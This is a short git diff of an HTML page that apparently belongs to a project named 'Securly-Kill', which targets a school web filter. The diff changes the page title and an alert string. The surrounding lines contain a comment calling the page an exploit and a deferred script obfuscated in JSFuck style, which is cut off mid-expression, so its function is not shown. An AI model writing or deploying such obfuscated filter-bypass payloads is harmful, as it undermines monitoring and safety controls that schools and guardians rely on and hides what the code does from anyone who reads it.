--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <link rel="icon" href="https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/main/IMG/insecurly%20icon.png">
     <meta charset="utf-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1" />
-    <title>skibidi</title>
+    <title>344hg39q8guiwh</title>
     <style>
         #error {
             display: none;
@@ -24,7 +24,7 @@
             display: inline-block !important;
         }
     </style>
-    <script>alert('really js dont use it')</script>
+    <script>alert('')</script>
     <!--   I personally could not care less whether this exploit gets patched -->
     <script defer>
         [][(![] + [])[+[]] + (![] + [])[!+[] + !+[]] + (![] + [])[+!+[]] + (!![] + [])[+[]]][([][(![] + [])[+[]] + (![] + [])[!+[] + !+[]] + (![] + [])[+!+[]] + (!![] + [])[+[]]] + [])[!+[] + !+[] + !+[]] + (!![] + [][(![] + [])[+[]] + (![] + [])[!+[] + !+[]] + (![] + [])[+!+[]] + (!![] + [])[+[]]])[+!+[] + [+[]]] + ([][
